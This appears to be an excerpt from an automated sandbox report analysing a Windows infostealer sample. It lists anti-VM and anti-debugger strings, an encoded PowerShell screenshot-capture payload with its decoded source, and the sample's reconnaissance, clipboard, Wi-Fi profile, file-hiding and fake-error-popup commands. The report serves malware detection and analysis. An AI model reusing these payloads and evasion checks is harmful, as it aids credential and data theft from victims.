            Source: net1.exe, 00000030.00000002.1767121596.00000228A90E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b"vmware"0
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser.exe
            Source: ROUTE.EXE, 0000003A.00000002.1785653815.000001C0E6679000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe"0U!
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V H?S
            Source: rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe", # VMware
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
            Source: rename_me_before.exe, 00000001.00000003.1948127865.000001B1028B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V H?[
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe", # VirtualBox
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977271486.000001B100CAC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971439621.000001B100CAB000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891031663.000001B101762000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1890887801.000001B10175B000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: E: Hyper-V Remote Deskto
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970864260.000001B10096C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1976544223.000001B10096C000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
            Source: rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V_EndRecData640
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977271486.000001B100CAC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971439621.000001B100CAB000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b'VMware'
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exe0E!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exe
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown S
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe"
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V V
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
            Source: rename_me_before.exe, 00000001.00000003.1946802827.000001B1015CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: # jVmCIddOhQT9W9J
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmware"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 'qemu'
            Source: net1.exe, 00000030.00000002.1767121596.00000228A90E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administratorsn
            Source: sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service InterfacevmicguestinterfaceVirtual DiskvdsCredential ManagerVaultSvcVolumetric Audio Compositor ServiceVacSvcUpdate Orchestrator ServiceU
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977271486.000001B100CAC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971439621.000001B100CAB000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891031663.000001B101762000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1890887801.000001B10175B000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe"
            Source: system_info.txt.1.drBinary or memory string: SERVICE_NAME: vmicvss
            Source: system_info.txt.1.drBinary or memory string: SERVICE_NAME: vmicheartbeat
            Source: rename_me_before.exe, 00000001.00000002.1980741579.000001B103362000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.drBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: HOSTNAME.EXE, 00000028.00000002.1741152783.000002228E2E9000.00000004.00000020.00020000.00000000.sdmp, ARP.EXE, 0000003B.00000002.1786834187.000001BC86B99000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000003C.00000002.1787389526.000001EFEBDB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: system_info.txt.1.drBinary or memory string: SERVICE_NAME: vmicshutdown
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Ti
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1948127865.000001B1028B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe"0
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"
            Source: sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WLAN AutoConfigWlanSvcWindows Insider ServicewisvcWindows Remote Management (WS-Management)WinRMWindows Management InstrumentationWinmgmtWinHTTP Web Proxy Auto-Discovery ServiceWinHttpAutoProxySvcMicrosoft Defender Antivirus ServiceWinDefendStill Image Acquisition EventsWiaRpcWi-Fi Direct Services Connection Manager ServiceWFDSConMgrSvcWindows Error Reporting ServiceWerSvcProblem Reports Control Panel SupportwercplsupportWindows Encryption Provider Host ServiceWEPHOSTSVCWindows Event CollectorWecsvcWebClientWebClientMicrosoft Defender Antivirus Network Inspection ServiceWdNisSvcDiagnostic System HostWdiSystemHostDiagnostic Service HostWdiServiceHostWindows Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup Engine ServicewbengineWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmictimesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Remote Desktop Virtualization ServicevmicrdvHyper-V Data Exchange ServicevmickvpexchangeHyper-V Heartbeat Servicevmicheartbeat
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: E: Hyper-V PowerShell Di
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemupR!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc.exepF!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware`
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "qemu-ga.exe"
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmacthlp.exe", # VMware
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if b'VMware' in stdout:
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6404EC44C
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640502790 GetProcessHeap,0_2_00007FF640502790
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6404EBBC0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6404EC44C
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404EC62C SetUnhandledExceptionFilter,0_2_00007FF6404EC62C
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6404F9924
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6404EBBC0
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6404EC44C
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404EC62C SetUnhandledExceptionFilter,1_2_00007FF6404EC62C
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 1_2_00007FF6404F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6404F9924

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Encrypted powershell cmdline option found
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Users\user\Desktop\rename_me_before.exe "C:\Users\user\Desktop\rename_me_before.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
